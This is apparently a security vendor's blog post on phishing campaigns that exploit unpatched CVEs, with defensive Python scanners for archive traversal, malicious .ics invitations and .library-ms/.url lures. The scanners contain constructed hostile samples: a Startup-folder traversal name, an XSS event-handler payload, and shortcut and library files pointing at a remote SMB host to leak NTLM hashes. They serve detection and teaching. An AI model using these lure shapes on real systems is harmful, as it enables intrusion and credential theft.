Greenbone Helps Defend Against Advanced Social Engineering Attacks
Urgency, fear, curiosity, trust, greed, sympathy: social engineering has been wildly successful at exploiting human emotions in cyber attacks, and most breach analysis reports place it among the top initial-access techniques. The recent rise in AI-enabled phishing and data theft further tilts the field toward adversaries, who now have contextual personal data and sensitive business information at their disposal.

Verizon’s 2025 Data Breach Investigations Report (DBIR) attributes roughly 17% of breaches globally, and 20% in the Asia-Pacific (APAC) region, to its “Social Engineering” incident pattern. According to Sprinto, social engineering was the initial access vector in roughly 36% of incidents in 2025. For enterprises the consequences can be disastrous: ransomware, data theft, and operational downtime can all produce revenue-shattering outcomes.
Among the most advanced social engineering campaigns lies a critical one-two punch: psychological manipulation combined with the exploitation of software flaws. These attack paths go beyond the “classical” phishing attack that steals a target’s username and password. They seek immediate unauthorized access to the victim’s computer, lateral movement within the local network, and data exfiltration, all from a single wrong click.
In this article we look at some sophisticated social engineering campaigns from the recent past: attacks that combine human deception with the exploitation of unpatched software flaws. Read on to learn more about the social engineering landscape and how proactive vulnerability management with OPENVAS SECURITY INTELLIGENCE supports a defense-in-depth security strategy, including protection against advanced social engineering attacks.
Advanced Social Engineering Attacks Require a “Defense In Depth” Approach
The most sophisticated social engineering attacks blend human deception with technical exploitation. The classic “phishing attack” [T1566] tricks users into entering their credentials, including MFA codes, into a well-crafted, spoofed website. However, in more advanced variants of social engineering attacks, adversaries can achieve remote code execution (RCE) directly on the victim’s system for full system compromise, install persistent malware, or even move laterally within an organization’s internal network [T1210].
Here’s how sophisticated social engineering attacks work:
- Phishing messages deliver malicious file attachments [T1566.001] or links [T1566.002] along with a social context urging the victim to click them [T1204].
- Once clicked, the attacker’s malicious payload is executed. Depending on the design, it may attempt to steal data [T1003][T1005], exploit exposed software weaknesses on the victim’s local system [T1203], or pivot to accessible network services [T1210].
- In some cases attackers don’t need to contact their targets directly at all. By staging malicious resources on the public Internet [T1189], they let victims stumble onto them through deceptive ads (malvertising) or while opening documents or running software they believe to be safe [T1204].
- Even if the first-stage social engineering attack does not directly exploit a software vulnerability, adversaries can import malware [T1105] for remote access to the victim’s computer.
- Once inside, adversaries quickly seek to extend their unauthorized access; gain persistence [TA0003], escalate their privileges [TA0004], and move laterally within the network [TA0008].
In all these cases, unpatched software often makes the difference between a contained security incident and an expensive data breach. Defense-in-depth controls including vulnerability management, patching, and network segmentation help ensure that even if a social engineering attempt succeeds, the attacker cannot extend their reach. By continuously identifying and mitigating exploitable weaknesses, vulnerability management limits the blast radius of initial access and stops a localized compromise from spreading across the environment.
How Greenbone Helps Defend Against Advanced Social Engineering Attacks
Greenbone helps organizations increase their resilience to advanced social engineering attacks by empowering defenders to close technical security gaps. Greenbone’s OPENVAS ENTERPRISE FEED includes over 200,000 individual vulnerability tests — truly an industry-leading detection engine. The feed is updated daily to ensure coverage of the latest emerging CVEs. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.
Vulnerability management is considered a fundamental security activity [1][2][3]. By maintaining a continuous vulnerability management process, organizations can significantly reduce the likelihood that a single phishing email or malicious attachment turns into a full-scale breach. Scanning the environment lets security teams identify and remediate not only the flaws that could give attackers initial access but also those that let them escalate privileges, move laterally, or deploy malware once a foothold is gained. With Greenbone’s new OPENVAS REPORT product offering, enterprises gain clear risk insights across their entire IT infrastructure and can quickly compile advanced compliance reports.
Social Engineering Campaigns Exploiting Unpatched Software
Many advanced social engineering campaigns are known to exploit unpatched software flaws. In this section we will review some real-world campaigns that leverage advanced exploit chaining via file-attachment and link-based attacks. However, the campaigns described below only scratch the surface of known campaigns and new attacks emerge on a continuous basis.
CVE-2025-8088: WinRAR Allows Attackers to Create Malicious Files
In mid-July 2025, ESET observed active exploitation of CVE-2025-8088 (CVSS 8.8), a path traversal flaw in WinRAR, in ongoing social engineering attacks. The bug lies in WinRAR’s handling of alternate data streams (ADS): a crafted archive can carry stream names containing traversal sequences, so extraction writes attacker-supplied files outside the chosen folder, including into the Windows Startup folder, where they run automatically the next time the victim logs in. The technical details of this campaign were covered on the Greenbone blog in August.
The attacks were attributed to RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), a Russia-aligned threat actor known for operating its own signature malware, the RomCom RAT. In this campaign, spearphishing emails delivered weaponized RAR archives to financial, manufacturing, defense, and logistics companies in Europe and Canada. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-8088.
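The pattern behind CVE-2025-8088 is a generic one: an archive member name is trusted as a relative path, and a crafted name walks out of the extraction directory. The following Python is added here as an illustration and is not code from Greenbone, ESET or WinRAR. It is a pre-extraction filter you can run over the member names any archive library hands you: it rejects absolute and UNC names, traversal that escapes the target directory, and alternate data stream names, including traversal hidden inside the ADS portion, which is the shape the reported CVE-2025-8088 lures took. The member names and the extraction directory are constructed for the example, and the set of ADS rules (reject every ADS entry from an untrusted archive) is this example’s own policy.

```python
"""Pre-extraction path-safety check for untrusted archive member names.

Added example (not Greenbone's, ESET's or WinRAR's code). Uses ntpath so the
Windows/NTFS rules are applied on any OS.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Verdict:
    name: str
    safe: bool
    reason: str


def check_member(name: str, extract_dir: str) -> Verdict:
    """Decide whether extracting `name` under `extract_dir` can only create
    files below `extract_dir`. Windows/NTFS path semantics are assumed."""
    # Archive formats on Windows accept both separators; normalise to '\'.
    n = name.replace("/", "\\")

    # Drive-letter, rooted ('\foo') and UNC ('\\srv\share') names ignore the
    # extraction directory entirely.
    if ntpath.isabs(n) or ntpath.splitdrive(n)[0]:
        return Verdict(name, False, "absolute path")

    # Anything after a ':' in a relative name is an NTFS alternate data stream.
    # NTFS resolves the stream name against the *file's* path, so '..' inside
    # the stream part walks up the tree just as it would in a file name
    # (assumption: the 'file.pdf:..\..\Startup\x.lnk' shape reported for
    # CVE-2025-8088). Untrusted archives have no legitimate reason to carry
    # ADS entries at all, so both cases are rejected.
    _base, sep, stream = n.partition(":")
    if sep:
        if ".." in stream.split("\\"):
            return Verdict(name, False, "traversal inside ADS name")
        return Verdict(name, False, "alternate data stream")

    # Resolve '.' and '..' and require the result to still sit below the
    # extraction directory. NTFS is case-insensitive, so compare lower-cased;
    # the trailing '\' stops 'cv2' from passing as a child of 'cv'.
    root = ntpath.normpath(extract_dir).lower().rstrip("\\") + "\\"
    resolved = ntpath.normpath(ntpath.join(extract_dir, n)).lower()
    if not resolved.startswith(root):
        return Verdict(name, False, "escapes extraction directory")
    return Verdict(name, True, "ok")


def safe_members(names, extract_dir):
    """Return the subset of member names that may be extracted."""
    return [n for n in names if check_member(n, extract_dir).safe]


# Constructed sample member names (not taken from a real archive).
SAMPLE_MEMBERS = [
    "resume.pdf",
    "docs/2025/report.docx",
    "..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Updater.lnk",
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "\\\\203.0.113.7\\share\\payload.exe",
    "resume.pdf:..\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Updater.lnk",
    "resume.pdf:Zone.Identifier",
]

if __name__ == "__main__":
    target = r"C:\Users\alice\Downloads\cv"
    for member in SAMPLE_MEMBERS:
        verdict = check_member(member, target)
        print(f"{'OK  ' if verdict.safe else 'DROP'} {verdict.reason:30} {member}")
```

Run the script and only the first two sample names survive; every other entry is dropped with the reason printed. The check is deliberately stricter than WinRAR’s fix: it refuses all ADS entries rather than only traversing ones, because a legitimate document archive never needs to restore alternate streams.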
CVE-2025-27915: Malicious Calendar Links to Exploit Zimbra Collaboration Suite
In September 2025, a campaign targeted the Brazilian military with poisoned .ICS calendar files crafted to exploit CVE-2025-27915 (CVSS 5.4), a stored cross-site scripting (XSS) vulnerability [CWE-79] in Zimbra Collaboration Suite. The phishing emails were disguised as legitimate invitations from foreign political entities. The .ICS files carried embedded JavaScript that executed automatically when the invitation was viewed in Zimbra’s Classic Web Client. The iCalendar format has a long history of security problems, including XSS vulnerabilities in a number of enterprise applications.
In this campaign, the attackers stole session cookies, email content and contact lists, and created malicious email forwarding rules to continuously exfiltrate the victims’ communications. Unpatched systems remain vulnerable and continue to be exploited in targeted attacks. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-27915.
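A mail gateway can triage calendar attachments before a webmail client ever renders them. The Python below is an added example, not Greenbone’s or Zimbra’s code: it unfolds RFC 5545 continuation lines (a folded line starts with a space or tab), splits each property into name, parameters and value at the first colon outside double quotes, and flags values that carry markup a calendar client might render as HTML. The sample invitations are constructed, and the event-handler payload (`<details open ontoggle=…>`) is one plausible XSS shape, not a reproduction of the real lure.

```python
"""Flag active HTML/script content inside iCalendar (.ics) attachments.

Added example (not Greenbone's or Zimbra's code). A triage heuristic for a
mail gateway or sandbox, not a fix for CVE-2025-27915.
"""
import re

# Markup that has no business inside a calendar property value.
SUSPICIOUS = (
    (re.compile(r"<\s*script\b", re.I), "script tag"),
    (re.compile(r"\bon[a-z]+\s*=", re.I), "HTML event handler"),
    (re.compile(r"javascript\s*:", re.I), "javascript: URI"),
    (re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I), "active HTML element"),
)


def unfold(ics: str) -> list[str]:
    """Join RFC 5545 folded lines: a continuation line starts with one space or tab.
    Scanning before unfolding would miss a handler split across the fold."""
    out: list[str] = []
    for raw in ics.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and out:
            out[-1] += raw[1:]
        else:
            out.append(raw)
    return out


def split_property(line: str):
    """Split 'NAME;PARAM=VAL:value' at the first ':' outside double quotes
    (parameters such as ALTREP="http://..." legitimately contain colons)."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            name, *params = line[:i].split(";")
            return name.strip().upper(), params, line[i + 1:]
    return None  # not a property line (blank, or malformed)


def scan_ics(ics: str) -> list[tuple[str, str]]:
    """Return (property name, finding) pairs for every suspicious property."""
    findings: list[tuple[str, str]] = []
    for line in unfold(ics):
        parsed = split_property(line)
        if parsed is None:
            continue
        name, params, value = parsed
        # Parameters (CN, ALTREP, ...) are rendered by some clients too.
        haystack = value + " " + " ".join(params)
        for pattern, label in SUSPICIOUS:
            if pattern.search(haystack):
                findings.append((name, label))
    return findings


# Constructed samples (not the real lure). The malicious one folds the
# DESCRIPTION so that 'ontoggle=' is split across two physical lines, and its
# ATTENDEE carries a quoted parameter.
MALICIOUS_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//Example//Invite//EN",
    "BEGIN:VEVENT",
    "UID:20250901T100000Z-1@example.invalid",
    "DTSTART;TZID=America/Sao_Paulo:20250915T100000",
    'ATTENDEE;CN="Office of Protocol";ROLE=REQ-PARTICIPANT:mailto:protocol@example.invalid',
    "SUMMARY:Official reception\\, 15 September",
    "DESCRIPTION:<details open onto",
    " ggle=\"eval(atob('YWxlcnQoMSk='))\">Agenda attached</details>",
    "END:VEVENT",
    "END:VCALENDAR",
])

BENIGN_ICS = "\r\n".join([
    "BEGIN:VCALENDAR",
    "VERSION:2.0",
    "PRODID:-//Example//Invite//EN",
    "BEGIN:VEVENT",
    "UID:20250901T100000Z-2@example.invalid",
    "DTSTART:20250915T100000Z",
    "SUMMARY:Status meeting on Monday",
    "DESCRIPTION:Agenda\\n1. Open items\\n2. Next steps",
    "END:VEVENT",
    "END:VCALENDAR",
])

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_ICS), ("benign", BENIGN_ICS)):
        print(label, scan_ics(sample))
```

The `X-ALT-DESC;FMTTYPE=text/html` property that Outlook emits legitimately contains HTML, so the patterns target script tags, event handlers and `javascript:` URIs rather than markup in general; tune the list to what your own calendar clients render, and quarantine rather than reject on a hit.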
CVE-2025-2783: Chrome Sandbox Escape to Deploy Spyware
In March 2025, phishing emails inviting recipients to a Russian policy forum lured victims into opening a personalized malicious link. When the link was opened in Chrome, the attacker’s page exploited CVE-2025-2783 (CVSS 8.3), a sandbox escape in the Mojo component of Google Chrome for Windows, to deploy spyware. Kaspersky, which discovered the attack, named the campaign Operation ForumTroll.
CVE-2025-2783 is an incorrect-handle flaw in Mojo, Chrome’s inter-process communication layer, and affects only the Windows build of Chrome. A sandbox escape of this kind is used after code execution has been obtained inside the renderer sandbox: it lets that code break out of the sandbox and interact with the Windows OS. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-2783 for Windows [1].
CVE-2025-24054: Windows NTLM Hash Leak Targeted Against European Entities
In March 2025, phishing emails carrying .library-ms attachments targeted government agencies and private firms in Poland and Romania. The attacks exploited a newly disclosed vulnerability, CVE-2025-24054 (CVSS 5.4), an NTLM hash disclosure flaw in Windows; exploitation began within days of the flaw being disclosed.
.library-ms files are XML Library Description files that define Windows Explorer libraries such as Documents and Pictures. The malicious .library-ms files pointed to attacker-controlled SMB servers and were delivered inside ZIP archives or via Dropbox links. Minimal interaction, such as selecting or viewing the file in Explorer, was enough to make Windows connect to the remote share and authenticate, leaking the user’s NTLMv2 hash to the attacker. The captured hashes were then relayed, or cracked offline, to achieve domain compromise and lateral movement in the victims’ networks.
CVE‑2024‑21412: Windows SmartScreen Bypass by DarkGate Operators
In mid-January 2024, the threat actors behind DarkGate malware began exploiting CVE-2024-21412 (CVSS 8.1), a Microsoft Defender SmartScreen bypass caused by incorrect handling of Internet Shortcut (.URL) files. Phishing emails delivered PDF attachments with embedded links that led victims to a .URL file, which in turn pointed to a second .URL hosted on a remote share; because SmartScreen did not evaluate that second shortcut, the chain loaded fake software installers without the usual warning. The installers masqueraded as legitimate software (such as NVIDIA or iTunes) and sideloaded a malicious DLL to deploy the DarkGate RAT.
The campaign targeted financial organizations across North America, Europe, Asia, and Africa. Microsoft issued a patch for CVE-2024-21412 on February 13th, 2024. However, this was not the first campaign to exploit a Windows SmartScreen bypass in social engineering attacks: in 2023, CVE-2023-36025 was similarly observed under active exploitation. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2024-21412 [1][2][3][4][5].
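Both the .library-ms lure from the CVE-2025-24054 campaign and the .URL chain from the CVE-2024-21412 campaign work by making Explorer resolve a reference to an attacker’s server, so one classifier serves both file types. The Python below is an added example and is not Greenbone’s, Check Point’s or Microsoft’s code. It parses the XML of a .library-ms and the INI-style body of a .url, then flags targets that are UNC paths, `file://` URLs with a remote host, or shortcuts resolving to another shortcut or an executable. The sample files are constructed (the 203.0.113.7 address is a documentation range), and the list of risky extensions is this example’s own choice.

```python
"""Spot Windows lure files that point Explorer at an attacker's server.

Added example (not Greenbone's, Check Point's or Microsoft's code).
  .library-ms : XML library definition; a <url> naming a remote share makes
                Explorer authenticate to it when the file is merely shown
                (the CVE-2025-24054 NTLM-leak shape).
  .url        : Internet Shortcut; a URL= pointing at a remote share or at
                another shortcut/executable is the CVE-2024-21412 chain shape.
"""
import configparser
import ntpath
import re
import xml.etree.ElementTree as ET

LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"
# Extensions a shortcut should never resolve to (this example's own list).
RISKY_EXT = {".url", ".lnk", ".exe", ".msi", ".vbs", ".js", ".jse", ".hta",
             ".cmd", ".bat", ".ps1", ".scr", ".dll", ".cpl", ".wsf"}


def classify_target(target: str) -> list[str]:
    """Reasons a path/URL found in a lure file is dangerous; [] if local and inert."""
    t = target.strip()
    reasons: list[str] = []
    # \\host\share (SMB, or WebDAV via \\host@SSL\...) forces an outbound
    # connection and NTLM authentication as soon as Explorer resolves it.
    if re.match(r"^(\\\\|//)[^\\/]+", t):
        reasons.append("UNC path to remote host")
    # file://host/share is the same thing spelled as a URL; file:///C:/... and
    # file:C:\... are local and ignored.
    m = re.match(r"(?i)^file:(?://)?([^/\\]*)", t)
    if m:
        host = m.group(1).lower()
        if host and host != "localhost" and not re.fullmatch(r"[a-z]:", host):
            reasons.append("file:// URL with remote host")
    # A shortcut resolving to another shortcut or an executable.
    path_only = t.split("?", 1)[0].split("#", 1)[0].replace("/", "\\")
    ext = ntpath.splitext(path_only)[1].lower()
    if ext in RISKY_EXT:
        reasons.append(f"target is a {ext} file")
    return reasons


def scan_library_ms(data) -> list[tuple[str, list[str]]]:
    """Return (url, reasons) for every library location that is not a local folder."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    # Untrusted XML: in production parse with defusedxml.ElementTree instead.
    root = ET.fromstring(data)
    flagged = []
    for el in root.iter(LIB_NS + "url"):
        url = (el.text or "").strip()
        reasons = classify_target(url)
        if re.match(r"(?i)^https?://", url):
            reasons.append("HTTP(S) location (not a local folder)")
        if reasons:
            flagged.append((url, reasons))
    return flagged


def scan_url_file(text: str) -> list[tuple[str, list[str]]]:
    """Return [(url, reasons)] for a risky URL= target of an Internet Shortcut, else []."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_option("InternetShortcut", "URL"):
        return []
    url = cp.get("InternetShortcut", "URL")
    reasons = classify_target(url)
    return [(url, reasons)] if reasons else []


# Constructed samples (not real campaign artefacts).
LIBRARY_MS_LURE = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\\\203.0.113.7\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

LIBRARY_MS_BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

URL_LURE = """[InternetShortcut]
URL=file://203.0.113.7/share/2.url
IDList=
IconFile=C:\\Windows\\System32\\shell32.dll
IconIndex=3
"""

URL_BENIGN = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for label, hits in (("library-ms", scan_library_ms(LIBRARY_MS_LURE)),
                        ("url", scan_url_file(URL_LURE))):
        for target, why in hits:
            print(f"[{label}] {target}: {', '.join(why)}")
```

Detection of the lure is only half the control. Because the NTLM leak fires when Explorer renders the file, not when the user opens it, the complementary mitigations are blocking outbound TCP 445 at the perimeter and setting the “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” policy, so that a lure which slips past the gateway has nowhere to send the hash.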
CVE-2024-42009: Roundcube Webmail XSS Flaw Exploited by UNC1151
In June 2025, a sophisticated spear-phishing campaign targeted Polish organizations using CVE-2024-42009 (CVSS 9.3), a critical cross-site scripting (XSS) flaw in Roundcube Webmail that allows arbitrary JavaScript to run in the user’s browser when a specially crafted email is simply opened.
In these attacks, the UNC1151 threat group sent invoice-themed emails that triggered the flaw to register a malicious Service Worker in the victim’s browser. The Service Worker then proxied the legitimate Roundcube login page while silently harvesting credentials, stealing address books, and enabling Business Email Compromise (BEC) attacks. Greenbone’s OPENVAS ENTERPRISE FEED provides detection for CVE-2024-42009.
CVE-2023-36884: Windows Search Exploited for RCE by Storm-0978
In mid-2023, threat actors used social engineering to exploit CVE-2023-36884 (CVSS 7.5), a race condition [CWE-362] in Windows Search that enables remote code execution. The campaign, attributed to RomCom (Storm-0978), distributed Word documents that played on urgency surrounding the Ukrainian World Congress to target staff at defense and government entities in Europe and North America. Once opened, the documents downloaded scripts, injected iframes and staged remote malware to exploit CVE-2023-36884.
The campaign caused financial losses, data theft, and operational disruption for the targeted organizations, and enabled espionage through credential compromise and the deployment of persistent remote access malware. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2023-36884.
Isn’t User Awareness Training Enough?
Many organizations launch user awareness training programs with high hopes, but their effectiveness has been called into question. Some findings indicate that training significantly improves recognition of phishing attempts, yet those gains fade over time without continuous reinforcement [1][2][3]. Improvement also differs by individual and takes time to materialize [4]. Another study found that combining awareness training with technical controls (e.g., MFA/OTPs and URL filtering) yields better prevention outcomes than training alone [5]. Other studies report negative findings:
- A large-scale study in 2025 found no significant benefits of training on click-rates or reporting rates [6].
- 43% of users executed at least one dangerous action over the course of a 15-month study [7].
- Inconsistent reinforcement or unrealistic simulations risk normalizing artificial behaviors, decreasing effectiveness against real-world attacks over time [8].
- While awareness training showed a slightly positive effect on reducing susceptibility to social engineering, the result was not statistically significant (p = 0.141) [9].
- Annual awareness training did not reduce phishing susceptibility, while simulation-based training produced a statistically significant but very small improvement. Training also suffers from low engagement: 75–90% of users spend less than one minute on it [10].
Therefore, while user awareness training may provide some protection against the most basic social engineering attacks, it is little comfort against highly targeted, sophisticated campaigns. For high resilience, defenders must plan additional security measures. Vulnerability management is a fundamental defense-in-depth security control for mitigating the impact of sophisticated social engineering attacks. By prioritizing vulnerability patches for assets impacted by flaws identified in active exploitation campaigns, organizations can reduce their risk of unauthorized initial access and prevent a widespread breach.
Summary
The most advanced social engineering attacks are not just out to steal usernames and passwords. Sophisticated campaigns combine stolen or public personal and business information to build highly convincing lures, and they deploy technical payloads that exploit software vulnerabilities on the victim’s computer and within the target’s network. To protect against the worst outcomes, defenders need a defense-in-depth approach to cyber security, including continuous vulnerability management. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.
Using Greenbone’s suite of security tools, defenders are better positioned to detect software vulnerabilities at scale within their IT environments, prioritize them, and patch the exposed attack surfaces that APT adversaries are poised to exploit. OPENVAS SECURITY INTELLIGENCE lets organizations experience first-hand how automated vulnerability scanning, daily feed updates, and clear risk reporting empower defenders against evolving social engineering and other exploitation campaigns.